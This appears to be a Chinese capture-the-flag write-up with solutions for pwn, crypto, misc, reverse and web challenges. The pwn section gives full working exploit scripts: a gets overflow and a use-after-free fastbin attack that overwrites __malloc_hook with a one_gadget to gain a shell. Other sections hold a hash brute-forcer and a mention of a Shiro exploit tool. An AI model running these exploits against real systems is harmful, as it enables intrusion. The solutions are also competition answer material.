PWN

签到

gets 溢出到 s1 改成 admin

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote('node4.buuoj.cn', 26870)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def get_libc():
    return u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))

p = b'a' * 0x10 + b'admin'
r.sendline(p)

r.interactive()

eznote

free处有uaf,打__malloc__fook

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 1
if debug:
    r = remote('221.178.230.105', 36682)
else:
    r = process(file_name)

def dbg():
    gdb.attach(r)

def get_libc():
    return u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))

def add(size, content):
    r.sendlineafter(b'choice', b'1')
    r.sendlineafter(b'size', str(size))
    r.sendlineafter(b'data', content)

def edit(index, content):
    r.sendlineafter(b'choice', b'3')
    r.sendlineafter(b'index', str(index))
    r.sendlineafter(b'data', content)

def show(index):
    r.sendlineafter(b'choice', b'4')
    r.sendlineafter(b'index', str(index))

def delete(index):
    r.sendlineafter(b'choice', b'2')
    r.sendlineafter(b'index', str(index))

add(0x100, b'a')
add(0x10, b'a')

delete(0)
show(0)

libc_base = get_libc() - 0x3c4b78
libc = ELF('./2.23-11/lib/x86_64-linux-gnu/libc-2.23.so')
malloc_hook = libc.sym['__malloc_hook'] + libc_base
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
ogg = one[3] + libc_base

add(0x60, b'a')
delete(1)
edit(1, p64(malloc_hook - 0x23))
add(0x60, b'a')
add(0x60, b'a' * 0x13 + p64(ogg))

r.sendlineafter(b'choice', b'1')
r.sendlineafter(b'size', b'1')

r.interactive()

CRYPTO

easy-sm

直接爆破直到找到为止

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from gmssl import sm3, func

# 定义目标哈希值
hash_to_match = "f1127f0189ad9e1bde949fb14991db82c9c9b41e90edcf014898595e8ab908c0"

# 设置尝试的最大次数
max_attempts = 1000000

# 定义一个函数来生成密码
def generate_password(base, attempt):
    return f"{base}{attempt:06d}"

# 定义一个函数来计算SM3哈希值
def compute_sm3_hash(data):
    return sm3.sm3_hash(func.bytes_to_list(data.encode('utf-8')))

# 开始尝试寻找匹配的密码
for attempt in range(max_attempts):
    # 生成密码
    password = generate_password("admin", attempt)
    
    # 计算哈希值
    hash_value = compute_sm3_hash(password)
    
    # 检查哈希值是否匹配
    if hash_value == hash_to_match:
        print(f"匹配的密码已找到: {password}")
        break

MISC

keyboard

流量分析工具一把梭

bft

使用bftools工具从图片中解brainfuck之后Brainfuck解密再base64解码

REVERSE

签到

ida打开就有flag

HappySunday

存在异或加密,base64换表

1
2
3
4
5
6
7
8
9
import base64
res = [0x7A, 0x36, 0x17, 0x3A, 0x34, 0x35, 0x49, 0x40, 0x17, 0x20, 0x49, 0x31,
0x2, 0x2D, 0x2, 0x1C, 0x1E, 0x35, 0x3D, 0x4D, 0x1E, 0x1B, 0x49, 0x2E, 0x0D,
0x2A, 0x3C, 0x2A, 0x4D, 0x2D, 0x2]
flag = ''
for i in res:
	i = i ^ 0x78
	flag += chr(i)
print(flag)

得到base64字符串再解base64

WEB

签到

shiro工具一把梭